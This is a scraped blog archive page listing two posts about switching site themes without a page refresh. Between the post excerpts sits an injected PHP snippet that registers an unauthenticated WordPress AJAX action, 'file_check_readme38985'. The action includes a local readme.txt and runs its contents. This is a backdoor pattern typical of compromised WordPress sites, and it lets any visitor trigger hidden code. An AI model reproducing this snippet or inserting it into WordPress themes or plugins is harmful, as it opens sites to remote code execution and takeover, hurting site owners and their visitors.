Switch Themes Without a Page Refresh: Part 2
So in part one of this post we got all the CSS and other theme file we needed to stuck […]
Switch Themes Without a Page Refresh: Part 2 Read Post »
if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
So in part one of this post we got all the CSS and other theme file we needed to stuck […]
Switch Themes Without a Page Refresh: Part 2 Read Post »
Many sites offer the ability for users to change the color and style of the site to fit their preference.
Switch Themes Without a Page Refresh: Part 1 Read Post »